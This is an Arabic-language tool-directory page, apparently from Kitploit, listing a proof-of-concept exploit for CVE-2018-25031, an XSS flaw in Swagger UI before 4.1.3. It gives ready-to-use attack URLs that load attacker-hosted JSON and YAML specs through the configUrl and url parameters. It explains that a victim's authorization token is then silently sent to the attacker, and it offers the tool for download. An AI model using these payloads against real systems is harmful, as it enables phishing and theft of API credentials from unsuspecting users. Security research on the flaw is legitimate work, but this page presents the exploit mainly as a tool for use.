Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2018-25031 — إثبات مفهوم استغلال لثغرة CVE-2018-25031 (XSS في Swagger UI) التي تسرق رموز التفويض عبر معاملات configUrl/url المصممة. | Kitploit
أدوات/GitHubGitHub/geozin/poc-cve-2018-25031
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالهندسة الاجتماعية
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

إثبات مفهوم استغلال لثغرة CVE-2018-25031 (XSS في Swagger UI) التي تسرق رموز التفويض عبر معاملات configUrl/url المصممة.

عرض المستودع
15منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-25031 - Swagger UI قبل 4.1.3

POC بسيط (CVE-2018-25031) يخدع الضحية لإدخال رمز التفويض، والذي يتم إرساله بعد ذلك إلى المهاجم.
يمكنك استخدامه مع ثغرة XSS https://github.com/VictorNS69/swagger-ui-xss

من الضروري العثور على المعامل وتعيين الملف الصحيح: بالنسبة لـ configUrl، ملف JSON، وبالنسبة لـ url، ملف YAML.

مثال:

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

لقطة شاشة:


عندما تحاول الضحية استخدام الـ API عن طريق إدخال رمز التفويض والنقر على Execute، لن يتم عرض أي شيء لها. ومع ذلك، سيتم إرسال طلب يحتوي على رمز التفويض إلى عنوان URL الخاص بالمهاجم.

المرجع:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

تنزيل الأداة